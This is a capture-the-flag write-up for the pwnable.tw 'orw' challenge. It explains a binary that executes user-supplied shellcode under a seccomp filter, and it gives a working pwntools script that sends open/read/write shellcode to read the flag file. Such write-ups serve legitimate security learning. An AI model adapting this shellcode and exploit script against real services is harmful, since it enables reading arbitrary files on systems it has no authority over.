Challenge hint: Read the flag from /home/orw/flag. Only open read write syscall are allowed to use.
checksec:
[*] '/home/kkkk/code/orw'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX disabled
PIE: No PIE (0x8048000)
RWX: Has RWX segments
Take a look at the pseudocode:
int __cdecl main(int argc, const char **argv, const char **envp)
{
    orw_seccomp();
    printf("Give my your shellcode:");
    read(0, &shellcode, 0xC8u);
    ((void (*)(void))shellcode)();
    return 0;
}
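The program reads 0xc8 bytes into the shellcode buffer, then casts the buffer to a function pointer and calls it.
This challenge only requires building a shellcode that does open, read and write.
pwntools can generate it automatically: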
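from pwn import *
context(os="linux", arch="i386", log_level="debug")
r = remote("chall.pwnable.tw", 10001)
# open() leaves the file descriptor in eax
payload = shellcraft.open("/home/orw/flag")
# read up to 0x80 bytes from that descriptor into the stack at esp
payload += shellcraft.read("eax", "esp", 0x80)
# write the same 0x80 bytes from esp to stdout (fd 1)
payload += shellcraft.write(1, "esp", 0x80)
r.sendafter(b"Give my your shellcode:", asm(payload))
r.interactive()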